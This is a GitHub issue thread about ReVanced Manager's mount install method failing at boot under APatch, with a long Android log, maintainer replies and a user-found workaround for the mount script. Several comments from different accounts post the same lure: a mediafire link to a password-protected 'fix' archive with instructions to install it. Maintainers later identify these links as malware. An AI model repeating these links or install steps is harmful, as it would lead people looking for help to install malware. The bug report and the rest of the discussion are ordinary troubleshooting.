### ISSUE TITLE
bug: Compatibility issue with APatch.

### ISSUE THREAD

**Issue by FirstMelody** [ReVanced/revanced-manager#2168]
### Bug description

When using mount method to patch, script failed to mount upon booting.

APatch version:10918 10916 10883 10865 (tried versions, all have the same problem)

APatch uses overlayfs just like KernelSU do. https://github.com/ReVanced/revanced-manager/issues/1592
Not very sure if this is a apatch issue or RVM issue.

### Version of ReVanced Manager and version & name of app you are patching

ReVanced Manager: 1.21.2
com.google.youtube

### Installation method

Mount

### ReVanced Manager logs

```shell
--------- beginning of main
08-28 14:20:54.123 30568 30568 E manager.flutter: Unknown bits set in runtime_flags: 0x40000000
08-28 14:20:54.123 30568 30568 I manager.flutter: Using CollectorTypeCC GC.
08-28 14:20:54.127 30568 30568 E manager.flutter: Not starting debugger since process cannot load the jdwp agent.
08-28 14:20:54.158 30568 30568 W libc    : Access denied finding property "persist.vendor.sys.activitylog"
08-28 14:20:54.158 30568 30568 I OneTrace: Mark active for pid=30568? true
08-28 14:20:54.158 30568 30568 D cutils-dev: otrace_set_tracing_enabled? true tag:0
08-28 14:20:54.158 30568 30568 D cutils-dev: properties changed in otrace_seq_number_changed!
08-28 14:20:54.167 30568 30583 D CompatibilityInfo: setOverrideInvertedScale  1.0 to 1.0
08-28 14:20:54.173 30568 30568 D OplusActivityManager: get AMS extension: android.os.BinderProxy@e71f10b
08-28 14:20:54.174 30568 30568 D CompatibilityChangeReporter: Compat change id reported: 171979766; UID 10491; state: ENABLED
08-28 14:20:54.174 30568 30568 D CompactWindowAppManager: initCompactApplicationInfo CompactMode: , NormalMode: 
08-28 14:20:54.176 30568 30568 D OplusScrollToTopManager: setIsInWhiteList false
08-28 14:20:54.176 30568 30568 D OplusViewDebugManager: OplusViewDebugManager Constructor android.view.debug.OplusViewDebugManager@a8e9201 [mHasViewDebugProperty true] [mHasMsgDebugProperty false] [DEBUG false] [EXTRAINFOENABLE false] [LIGHT_OS false]
08-28 14:20:54.177 30568 30568 D CompatibilityChangeReporter: Compat change id reported: 242716250; UID 10491; state: ENABLED
08-28 14:20:54.179 30568 30568 W libc    : Access denied finding property "ro.odm.prev.product.name"
08-28 14:20:54.188 30568 30568 D nativeloader: Configuring clns-4 for other apk /data/app/~~3i0DKCWfXzZ0GucKgy0WsA==/app.revanced.manager.flutter-w-i4S2ofNc8s0wUYdnmKEg==/base.apk. target_sdk_version=34, uses_libraries=, library_path=/data/app/~~3i0DKCWfXzZ0GucKgy0WsA==/app.revanced.manager.flutter-w-i4S2ofNc8s0wUYdnmKEg==/lib/arm64:/data/app/~~3i0DKCWfXzZ0GucKgy0WsA==/app.revanced.manager.flutter-w-i4S2ofNc8s0wUYdnmKEg==/base.apk!/lib/arm64-v8a, permitted_path=/data:/mnt/expand:/data/user/0/app.revanced.manager.flutter
08-28 14:20:54.195 30568 30568 V GraphicsEnvironment: Currently set values for:
08-28 14:20:54.195 30568 30568 V GraphicsEnvironment:   angle_gl_driver_selection_pkgs=[]
08-28 14:20:54.195 30568 30568 V GraphicsEnvironment:   angle_gl_driver_selection_values=[]
08-28 14:20:54.196 30568 30568 V GraphicsEnvironment: ANGLE GameManagerService for app.revanced.manager.flutter: false
08-28 14:20:54.196 30568 30568 V GraphicsEnvironment: app.revanced.manager.flutter is not listed in per-application setting
08-28 14:20:54.196 30568 30568 V GraphicsEnvironment: Updatable production driver is not supported on the device.
--------- beginning of system
08-28 14:20:54.202 30568 30568 D ResourcesManagerExtImpl: applyConfigurationToAppResourcesLocked app.getDisplayId() return callback.displayId:-1
08-28 14:20:54.205 30568 30568 D ExtensionsLoader: createInstance(64bit) : createExtendedFactory
08-28 14:20:54.205 30568 30568 D ExtensionsLoader: Opened libSchedAssistExtImpl.so
08-28 14:20:54.205 30568 30568 E SchedAssist: sysOpen failed with error=Permission denied
08-28 14:20:54.205 30568 30568 E SchedAssist: open sharedFd failed with error=Permission denied
08-28 14:20:54.205 30568 30568 E SchedAssist: open sharedFd failed with error=Permission denied
08-28 14:20:54.205 30568 30568 E SchedAssist: open sharedFd failed with error=No such file or directory
08-28 14:20:54.207 30568 30568 D OplusGraphicsEvent: OplusGraphicsEventListener create now!
08-28 14:20:54.209 30568 30568 D OplusGraphicsEvent: addEventListener success!
08-28 14:20:54.210 30568 30568 D ScrollOptim [ConfigManager]: initOptConfig: pkg= app.revanced.manager.flutter, mOptEnable= true, mAnimAheadEnable= true, mInsertDefaultNum= 1, mFrameInsertEnableList= {}, mSCEnableList= []
08-28 14:20:54.217 30568 30568 I OpenGLRenderer: SupportApps size 0
08-28 14:20:54.226 30568 30596 E manager.flutter: Loaded layer handle (10478572310594196773) for layer /my_product/lib64/libcolorx-loader.so
08-28 14:20:54.226 30568 30596 E manager.flutter: Looking for entrypoint ColorX_Check
08-28 14:20:54.226 30568 30596 E manager.flutter: Found ColorX_Check for /my_product/lib64/libcolorx-loader.so
08-28 14:20:54.226 30568 30596 E manager.flutter: Check failed
08-28 14:20:54.240 30568 30568 D ResourcesManagerExtImpl: applyConfigurationToAppResourcesLocked app.getDisplayId() return callback.displayId:-1
08-28 14:20:54.275 30568 30568 I AdrenoGLES-0: QUALCOMM build                   : 1394a2c7a8, Id12349e41b
08-28 14:20:54.275 30568 30568 I AdrenoGLES-0: Build Date                       : 02/23/24
08-28 14:20:54.275 30568 30568 I AdrenoGLES-0: OpenGL ES Shader Compiler Version: E031.45.02.05
08-28 14:20:54.275 30568 30568 I AdrenoGLES-0: Local Branch                     : 
08-28 14:20:54.275 30568 30568 I AdrenoGLES-0: Remote Branch                    : refs/tags/AU_LINUX_ANDROID_LA.VENDOR.14.3.0.11.00.00.973.498
08-28 14:20:54.275 30568 30568 I AdrenoGLES-0: Remote Branch                    : NONE
08-28 14:20:54.275 30568 30568 I AdrenoGLES-0: Reconstruct Branch               : NOTHING
08-28 14:20:54.275 30568 30568 I AdrenoGLES-0: Build Config                     : S P 16.1.2 AArch64
08-28 14:20:54.275 30568 30568 I AdrenoGLES-0: Driver Path                      : /vendor/lib64/egl/libGLESv2_adreno.so
08-28 14:20:54.275 30568 30568 I AdrenoGLES-0: Driver Version                   : 0762.10
08-28 14:20:54.275 30568 30568 I AdrenoGLES-0: Process Name                     : app.revanced.manager.flutter
08-28 14:20:54.282 30568 30568 I AdrenoGLES-0: PFP: 0x01520171, ME: 0x01520023
08-28 14:20:54.287 30568 30568 I AdrenoUtils: <ReadGpuID:357>: Reading chip ID through GSL
08-28 14:20:54.294 30568 30568 D FlutterFileDialogPlugin: onAttachedToEngine - IN
08-28 14:20:54.294 30568 30568 D FlutterFileDialogPlugin: doOnAttachedToEngine - IN
08-28 14:20:54.294 30568 30568 D FlutterFileDialogPlugin: doOnAttachedToEngine - OUT
08-28 14:20:54.295 30568 30568 D FlutterFileDialogPlugin: onAttachedToEngine - OUT
08-28 14:20:54.295 30568 30568 D FlutterFileDialogPlugin: onAttachedToActivity
08-28 14:20:54.295 30568 30568 D FlutterFileDialogPlugin: doOnAttachedToActivity - IN
08-28 14:20:54.295 30568 30568 D FlutterFileDialogPlugin: doOnAttachedToActivity - OUT
08-28 14:20:54.296 30568 30568 I oplus.android.OplusFrameworkFactoryImpl: Unknow feature:IOplusTextViewRTLUtilForUG
08-28 14:20:54.300 30568 30568 D ExtensionsLoader: createInstance(64bit) : createExtendedFactory
08-28 14:20:54.300 30568 30568 D ExtensionsLoader: Opened libguiextimpl.so
08-28 14:20:54.302 30568 30568 D OplusInputMethodUtil: init sDebug to false, init sDebugIme to false, init sAlwaysOn to false
08-28 14:20:54.302 30568 30568 D OplusInputMethodUtil: updateDebugToClass InputMethodManager.DEBUG = false
08-28 14:20:54.302 30568 30568 D OplusInputMethodUtil: updateDebugToClass ImeFocusController.DEBUG = false
08-28 14:20:54.302 30568 30568 D OplusInputMethodUtil: updateDebugToClass BaseInputConnection.DEBUG = false
08-28 14:20:54.314 30568 30568 D ScrollOptim [SceneManager]: updateCurrentActivity: mCurrentActivityName=app.revanced.manager.flutter.MainActivity, isOptEnable=true, isAnimAheadEnable=true, isFrameInsertEnable=true, InsertNum=1, isEnabledForScrollChanged=false
08-28 14:20:54.314 30568 30568 D ActivityThread: ComponentInfo{app.revanced.manager.flutter/app.revanced.manager.flutter.MainActivity} checkFinished=false 2
08-28 14:20:54.314 30568 30568 D ResourcesManagerExtImpl: applyConfigurationToAppResourcesLocked app.getDisplayId() return callback.displayId:-1
08-28 14:20:54.317 30568 30568 D CompatibilityChangeReporter: Compat change id reported: 237531167; UID 10491; state: DISABLED
08-28 14:20:54.319 30568 30568 I DynamicFramerate [FRTCConfigManager]: initFrameRateConfig: 
08-28 14:20:54.319 30568 30568 I DynamicFramerate [FRTCConfigManager]: 	levels: [120, 60]
08-28 14:20:54.319 30568 30568 I DynamicFramerate [FRTCConfigManager]: 	thresholds: [200]
08-28 14:20:54.319 30568 30568 I DynamicFramerate [FRTCConfigManager]: 	scrollbar fade frame rate: 0
08-28 14:20:54.319 30568 30568 I DynamicFramerate [FRTCConfigManager]: FRTCConfigManager: FRTC_CAPABILITY = 120, package name = app.revanced.manager.flutter, WINDOW_ANIMATION_SPEED_RATE = 10, SCROLL_ANIMATION_SPEED_RATE = 20, MuitiWindowIdleFramerate = 60, PACKAGE_ENABLE = false
08-28 14:20:54.319 30568 30568 I DynamicFramerate [DynamicFrameRateController]: init info: mPackageName = app.revanced.manager.flutter, mIsEnabled = false
08-28 14:20:54.319 30568 30568 D WindowManager: Add to mViews: DecorView@33d37b4[MainActivity],pkg= app.revanced.manager.flutter
08-28 14:20:54.319 30568 30594 D ExtensionsLoader: createInstance(64bit) : createExtendedFactory
08-28 14:20:54.320 30568 30594 D ExtensionsLoader: Opened libhwuiextimpl.so
08-28 14:20:54.320 30568 30568 D ExtensionsLoader: createInstance(64bit) : createExtendedFactory
08-28 14:20:54.320 30568 30568 D ExtensionsLoader: Opened libSchedAssistExtImpl.so
08-28 14:20:54.325 30568 30568 D ViewRootImplExtImpl: onDisplayChanged -1 for VRI android.view.ViewRootImpl@2501b20
08-28 14:20:54.326 30568 30568 W libc    : Access denied finding property "ro.vendor.input.resample_latency_time"
08-28 14:20:54.327 30568 30568 D InputEventReceiver: Input log is disabled in InputEventReceiver.
08-28 14:20:54.327 30568 30568 D ResourcesManagerExtImpl: applyConfigurationToAppResourcesLocked app.getDisplayId() return callback.displayId:-1
08-28 14:20:54.328 30568 30568 I Quality : Skipped: false 1 cost 13.503333 refreshRate 8273704 bit true processName app.revanced.manager.flutter
08-28 14:20:54.328 30568 30568 E OplusBracketLog: [OplusViewMirrorManager] updateHostViewRootIfNeeded, not support android.view.ViewRootImpl@2501b20
08-28 14:20:54.332 30568 30568 I SurfaceView: 126483061 onAttachedToWindow
08-28 14:20:54.332 30568 30568 D ViewRootImplExtImpl: wrapConfigInfoIntoFlags rotation=0, smallestScreenWidthDp=411, relayoutAsync=false, newFlags=26935296, title=app.revanced.manager.flutter/app.revanced.manager.flutter.MainActivity
08-28 14:20:54.339 30568 30568 D VRI[MainActivity]: relayoutWindow result, sizeChanged:true, surfaceControlChanged:true, transformHintChanged:true, mSurfaceSize:Point(1440, 3168), mLastSurfaceSize:Point(0, 0), mWidth:-1, mHeight:-1, requestedWidth:1440, requestedHeight:3168, transformHint:0, lastTransformHint:-2147483648, installOrientation:0, displayRotation:0, isSurfaceValid:true, attr.flag:-2122252032, useBlast:true, tmpFrames:ClientWindowFrames{frame=[0,0][1440,3168] display=[0,0][1440,3168] parentFrame=[0,0][0,0]}, relayoutAsync:false, mSyncSeqId:0, params:{(0,0)(fillxfill) sim={adjust=resize} ty=BASE_APPLICATION fmt=TRANSLUCENT wanim=0x1030001
08-28 14:20:54.339 30568 30568 D VRI[MainActivity]:   fl=LAYOUT_IN_SCREEN LAYOUT_INSET_DECOR SPLIT_TOUCH HARDWARE_ACCELERATED DRAWS_SYSTEM_BAR_BACKGROUNDS
08-28 14:20:54.339 30568 30568 D VRI[MainActivity]:   pfl=NO_MOVE_ANIMATION FORCE_DRAW_STATUS_BAR_BACKGROUND USE_BLAST FIT_INSETS_CONTROLLED
08-28 14:20:54.339 30568 30568 D VRI[MainActivity]:   vsysui=LAYOUT_STABLE LAYOUT_FULLSCREEN
08-28 14:20:54.339 30568 30568 D VRI[MainActivity]:   bhv=DEFAULT
08-28 14:20:54.339 30568 30568 D VRI[MainActivity]:   fitSides= CLP[ ]}
08-28 14:20:54.340 30568 30568 W VRI[MainActivity]: updateBlastSurfaceIfNeeded, surfaceSize:Point(1440, 3168), lastSurfaceSize:Point(0, 0), format:-3, blastBufferQueue:null
08-28 14:20:54.344 30568 30568 D BufferQueueConsumer: [](id:776800000000,api:0,p:-1,c:30568) connect: controlledByApp=false
08-28 14:20:54.344 30568 30568 D ExtensionsLoader: createInstance(64bit) : createExtendedFactory
08-28 14:20:54.344 30568 30568 D ExtensionsLoader: Opened libSchedAssistExtImpl.so
08-28 14:20:54.345 30568 30568 W libc    : Access denied finding property "vendor.display.enable_optimal_refresh_rate"
08-28 14:20:54.348 30568 30568 E OplusDisplayModeManager: has been initialized.
08-28 14:20:54.351 30568 30594 D BufferQueueProducer: [VRI[MainActivity]#0(BLAST Consumer)0](id:776800000000,api:1,p:30568,c:30568) connect: api=1 producerControlledByApp=true
08-28 14:20:54.351 30568 30594 E OpenGLRenderer: Unable to match the desired swap behavior.
08-28 14:20:54.354 30568 30568 D BufferQueueConsumer: [](id:776800000001,api:0,p:-1,c:30568) connect: controlledByApp=false
08-28 14:20:54.355 30568 30568 D Dolphin : [App: ST:1, STM:0, STD:1]
08-28 14:20:54.356 30568 30568 W libc    : Access denied finding property "vendor.display.enable_optimal_refresh_rate"
08-28 14:20:54.356 30568 30568 I SurfaceView: 126483061 visibleChanged -- surfaceCreated 
08-28 14:20:54.356 30568 30600 D BufferQueueProducer: [SurfaceView[app.revanced.manager.flutter/app.revanced.manager.flutter.MainActivity]#1(BLAST Consumer)1](id:776800000001,api:1,p:30568,c:30568) connect: api=1 producerControlledByApp=true
08-28 14:20:54.358 30568 30568 D SurfaceView: 126483061 handleSyncNoBuffer
08-28 14:20:54.358 30568 30568 D SurfaceView: 126483061 finishedDrawing
08-28 14:20:54.358 30568 30568 D SurfaceView: 126483061 performDrawFinished mAttachedToWindow true
08-28 14:20:54.358 30568 30568 W ViewRootImpl: cancelAndRedraw cancelDueToPreDrawListener true cancelDraw false mDrewOnceForSync false isSyncRequest false
08-28 14:20:54.358 30568 30568 D ViewRootImplExtImpl: setMaxDequeuedBufferCount: 2
08-28 14:20:54.360 30568 30568 I Quality : Skipped: false 3 cost 26.830816 refreshRate 8273269 bit true processName app.revanced.manager.flutter
08-28 14:20:54.360 30568 30568 W ViewRootImpl: cancelAndRedraw cancelDueToPreDrawListener true cancelDraw false mDrewOnceForSync false isSyncRequest false
08-28 14:20:54.360 30568 30568 W VRI[MainActivity]: handleResized, msg:5, frameChanged:false, configChanged:false, displayChanged:false, attachedFrameChanged:false, compatScaleChanged:false, pendingDragResizing=false
08-28 14:20:54.467 30568 30568 I Quality : Skipped: false 12 cost 101.18545 refreshRate 8273091 bit true processName app.revanced.manager.flutter
08-28 14:20:54.468 30568 30568 W ViewRootImpl: cancelAndRedraw cancelDueToPreDrawListener true cancelDraw false mDrewOnceForSync false isSyncRequest false
08-28 14:20:54.474 30568 30568 W ViewRootImpl: cancelAndRedraw cancelDueToPreDrawListener true cancelDraw false mDrewOnceForSync false isSyncRequest false
08-28 14:20:54.482 30568 30568 W ViewRootImpl: cancelAndRedraw cancelDueToPreDrawListener true cancelDraw false mDrewOnceForSync false isSyncRequest false
08-28 14:20:54.563 30568 30568 I Quality : Skipped: false 8 cost 72.95499 refreshRate 8273342 bit true processName app.revanced.manager.flutter
08-28 14:20:54.563 30568 30568 W ViewRootImpl: cancelAndRedraw cancelDueToPreDrawListener true cancelDraw false mDrewOnceForSync false isSyncRequest false
08-28 14:20:54.592 30568 30568 I Quality : Skipped: false 3 cost 27.860832 refreshRate 8273259 bit true processName app.revanced.manager.flutter
08-28 14:20:54.593 30568 30568 W ViewRootImpl: cancelAndRedraw cancelDueToPreDrawListener true cancelDraw false mDrewOnceForSync false isSyncRequest false
08-28 14:20:54.626 30568 30568 I Quality : Skipped: false 3 cost 28.4649 refreshRate 8273285 bit true processName app.revanced.manager.flutter
08-28 14:20:54.626 30568 30568 W ViewRootImpl: cancelAndRedraw cancelDueToPreDrawListener true cancelDraw false mDrewOnceForSync false isSyncRequest false
08-28 14:20:54.631 30568 30568 W ViewRootImpl: cancelAndRedraw cancelDueToPreDrawListener true cancelDraw false mDrewOnceForSync false isSyncRequest false
08-28 14:20:54.639 30568 30568 D ViewRootImplExtImpl: wrapConfigInfoIntoFlags rotation=0, smallestScreenWidthDp=411, relayoutAsync=false, newFlags=26935296, title=app.revanced.manager.flutter/app.revanced.manager.flutter.MainActivity
08-28 14:20:54.642 30568 30568 D VRI[MainActivity]: relayoutWindow result, sizeChanged:false, surfaceControlChanged:false, transformHintChanged:false, mSurfaceSize:Point(1440, 3168), mLastSurfaceSize:Point(1440, 3168), mWidth:1440, mHeight:3168, requestedWidth:1440, requestedHeight:3168, transformHint:0, lastTransformHint:0, installOrientation:0, displayRotation:0, isSurfaceValid:true, attr.flag:-2122252032, useBlast:true, tmpFrames:ClientWindowFrames{frame=[0,0][1440,3168] display=[0,0][1440,3168] parentFrame=[0,0][0,0]}, relayoutAsync:false, mSyncSeqId:0, params:{(0,0)(fillxfill) sim={adjust=resize} ty=BASE_APPLICATION fmt=TRANSLUCENT wanim=0x1030001
08-28 14:20:54.642 30568 30568 D VRI[MainActivity]:   fl=LAYOUT_IN_SCREEN LAYOUT_INSET_DECOR SPLIT_TOUCH HARDWARE_ACCELERATED DRAWS_SYSTEM_BAR_BACKGROUNDS
08-28 14:20:54.642 30568 30568 D VRI[MainActivity]:   pfl=NO_MOVE_ANIMATION FORCE_DRAW_STATUS_BAR_BACKGROUND USE_BLAST FIT_INSETS_CONTROLLED
08-28 14:20:54.642 30568 30568 D VRI[MainActivity]:   vsysui=LAYOUT_STABLE LAYOUT_HIDE_NAVIGATION LAYOUT_FULLSCREEN
08-28 14:20:54.642 30568 30568 D VRI[MainActivity]:   bhv=DEFAULT
08-28 14:20:54.642 30568 30568 D VRI[MainActivity]:   fitSides= CLP[ ]}
08-28 14:20:54.643 30568 30568 W VRI[MainActivity]: updateBlastSurfaceIfNeeded, surfaceSize:Point(1440, 3168), lastSurfaceSize:Point(1440, 3168), format:-3, blastBufferQueue:android.graphics.BLASTBufferQueue@8a6c1e3
08-28 14:20:54.643 30568 30568 W ViewRootImpl: cancelAndRedraw cancelDueToPreDrawListener true cancelDraw false mDrewOnceForSync false isSyncRequest false
08-28 14:20:54.646 30568 30599 I flutter : dynamic_color: Core palette detected.
08-28 14:20:54.652 30568 30600 D BLASTBufferQueue: [SurfaceView[app.revanced.manager.flutter/app.revanced.manager.flutter.MainActivity]#1](f:0,a:1) acquireNextBufferLocked size=1440x3168 mFrameNumber=1 applyTransaction=true mTimestamp=175729573525(auto) mPendingTransactions.size=0 graphicBufferId=131288560304128 transform=0
08-28 14:20:54.725 30568 30568 D SurfaceView: 126483061 handleSyncNoBuffer
08-28 14:20:54.725 30568 30568 D SurfaceView: 126483061 finishedDrawing
08-28 14:20:54.725 30568 30568 D SurfaceView: 126483061 performDrawFinished mAttachedToWindow true
08-28 14:20:54.726 30568 30568 I Quality : Skipped: false 9 cost 78.28296 refreshRate 8273350 bit true processName app.revanced.manager.flutter
08-28 14:20:54.726 30568 30568 I SurfaceControl:  setExtendedRangeBrightness sc=Surface(name=app.revanced.manager.flutter/app.revanced.manager.flutter.MainActivity)/@0x8f9993f,currentBufferRatio=1.0,desiredRatio=1.0
08-28 14:20:54.727 30568 30568 D SurfaceView: 126483061 dispatchDraw mDrawFinished true isAboveParent false (mPrivateFlags & PFLAG_SKIP_DRAW) 128
08-28 14:20:54.727 30568 30568 D SurfaceView: 126483061 clearSurfaceViewPort mCornerRadius 0.0
08-28 14:20:54.731 30568 30594 D BLASTBufferQueue: [VRI[MainActivity]#0](f:0,a:1) acquireNextBufferLocked size=1440x3168 mFrameNumber=1 applyTransaction=true mTimestamp=175807755817(auto) mPendingTransactions.size=0 graphicBufferId=131288560304131 transform=0
08-28 14:20:54.731 30568 30594 D VRI[MainActivity]: Received frameCommittedCallback lastAttemptedDrawFrameNum=1 didProduceBuffer=true syncBuffer=false
08-28 14:20:54.731 30568 30568 D VRI[MainActivity]: draw finished. seqId=0
08-28 14:20:54.731 30568 30568 D VRI[MainActivity]: reportDrawFinished
08-28 14:20:54.761 30568 30568 D VRI[MainActivity]: onFocusEvent true
08-28 14:20:55.639 30568 30599 E flutter : [ERROR:flutter/runtime/dart_vm_initializer.cc(41)] Unhandled Exception: PlatformException(invalid_icon, The resource ic_notification could not be found. Please make sure it has been added as a drawable resource to your Android head project., null, null)
08-28 14:20:55.639 30568 30599 E flutter : #0      StandardMethodCodec.decodeEnvelope (package:flutter/src/services/message_codecs.dart:648)
08-28 14:20:55.639 30568 30599 E flutter : #1      MethodChannel._invokeMethod (package:flutter/src/services/platform_channel.dart:334)
08-28 14:20:55.639 30568 30599 E flutter : <asynchronous suspension>
08-28 14:20:55.639 30568 30599 E flutter : #2      AndroidFlutterLocalNotificationsPlugin.initialize (package:flutter_local_notifications/src/platform_flutter_local_notifications.dart:143)
08-28 14:20:55.639 30568 30599 E flutter : <asynchronous suspension>
08-28 14:20:55.639 30568 30599 E flutter : #3      HomeViewModel.initialize (package:revanced_manager/ui/views/home/home_viewmodel.dart:67)
08-28 14:20:55.639 30568 30599 E flutter : <asynchronous suspension>
08-28 14:20:55.639 30568 30599 E flutter : 
08-28 14:20:55.766 30568 30606 D OplusScrollToTopManager: app.revanced.manager.flutter/app.revanced.manager.flutter.MainActivity,This DecorView@33d37b4[MainActivity] change focus to true
08-28 14:20:56.870 30568 30568 D OplusInputMethodManagerInternal: get inputMethodManager extension: com.android.internal.view.IInputMethodManager$Stub$Proxy@d09c474
08-28 14:20:56.871 30568 30568 D ViewRootImplExtImpl: MotionEvent MotionEvent { action=ACTION_UP, actionButton=0, id[0]=0, x[0]=1173.9492, y[0]=3006.5654, toolType[0]=TOOL_TYPE_FINGER, buttonState=0, classification=NONE, metaState=0, flags=0x0, edgeFlags=0x0, pointerCount=1, historySize=0, eventTime=177944, downTime=177854, deviceId=6, source=0x1002, displayId=0, eventId=968940045 } handled by client, just return
08-28 14:20:57.788 30568 30568 D ViewRootImplExtImpl: MotionEvent MotionEvent { action=ACTION_UP, actionButton=0, id[0]=0, x[0]=1064.2041, y[0]=2036.5225, toolType[0]=TOOL_TYPE_FINGER, buttonState=0, classification=NONE, metaState=0, flags=0x0, edgeFlags=0x0, pointerCount=1, historySize=0, eventTime=178863, downTime=178523, deviceId=6, source=0x1002, displayId=0, eventId=681803123 } handled by client, just return
08-28 14:20:58.360 30568 30568 D ViewRootImplExtImpl: MotionEvent MotionEvent { action=ACTION_UP, actionButton=0, id[0]=0, x[0]=1098.2021, y[0]=1871.4629, toolType[0]=TOOL_TYPE_FINGER, buttonState=0, classification=NONE, metaState=0, flags=0x0, edgeFlags=0x0, pointerCount=1, historySize=0, eventTime=179436, downTime=179296, deviceId=6, source=0x1002, displayId=0, eventId=881382641 } handled by client, just return
08-28 14:20:59.689 30568 30961 D ProfileInstaller: Installing profile for app.revanced.manager.flutter
08-28 14:20:59.901 30568 30568 D ViewRootImplExtImpl: MotionEvent MotionEvent { action=ACTION_UP, actionButton=0, id[0]=0, x[0]=1248.3213, y[0]=1637.2178, toolType[0]=TOOL_TYPE_FINGER, buttonState=0, classification=NONE, metaState=0, flags=0x0, edgeFlags=0x0, pointerCount=1, historySize=0, eventTime=180975, downTime=180683, deviceId=6, source=0x1002, displayId=0, eventId=186204010 } handled by client, just return
08-28 14:21:00.480 30568 30568 D ViewRootImplExtImpl: MotionEvent MotionEvent { action=ACTION_UP, actionButton=0, id[0]=0, x[0]=1236.0713, y[0]=1688.8418, toolType[0]=TOOL_TYPE_FINGER, buttonState=0, classification=NONE, metaState=0, flags=0x0, edgeFlags=0x0, pointerCount=1, historySize=0, eventTime=181555, downTime=181393, deviceId=6, source=0x1002, displayId=0, eventId=112288461 } handled by client, just return
08-28 14:21:02.913 30568 30568 D ViewRootImplExtImpl: MotionEvent MotionEvent { action=ACTION_UP, actionButton=0, id[0]=0, x[0]=1109.2021, y[0]=1659.9053, toolType[0]=TOOL_TYPE_FINGER, buttonState=0, classification=NONE, metaState=0, flags=0x0, edgeFlags=0x0, pointerCount=1, historySize=0, eventTime=183988, downTime=183906, deviceId=6, source=0x1002, displayId=0, eventId=432300247 } handled by client, just return
```

### Acknowledgements

- [X] I have checked all open and closed bug reports and this is not a duplicate.
- [X] I have chosen an appropriate title.
- [X] All requested information has been provided properly.
- [X] The bug is only related to ReVanced Manager.

**Comment by oSumAtrIX** [comment]
Run the mount script in `/data/adb/service.d` and check for any error

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by validcube** [comment]
While I understand that workaround exist but please not distribute file content as that can be potentially use for malicious intents (I assume most of us probably don't regularly send 2.8 petabytes zip-bomb to strangers... Right?) thanks for understanding!

**Comment by validcube** [comment]
(temporary locked 24 hours due to spam)

**Comment by oSumAtrIX** [comment]
The deleted comments were linking to malware, please reach out to apatch@revanced.app for this issue.

**Comment by FirstMelody** [comment]
It is an issue related to APatch and its root hiding kpm called Cherish Peekaboo. These two tweaked something in system and make root user cannot use pm command properly. Already identified by devs and finding solutions.

For now, an easy workaround is changing the base_path line in mount script to:
stock_path=$(pm path com.google.android.youtube --user 0 2>&1 </dev/null | sed "s/package://g" )
which will bypass the selinux restrictions.

**Comment by FirstMelody** [comment]
> `--user 0 2` Would this not only work if the app is a system app? User 0 is root. Users installing apps don't have id 0

"--user 0 " is unnessary. It was there because I was trying to run the command as root.... Only working part is the 2>&1 </dev/null part

**Comment by oSumAtrIX** [comment]
I don't see why you need that, depending on if you use APatch or Magisk
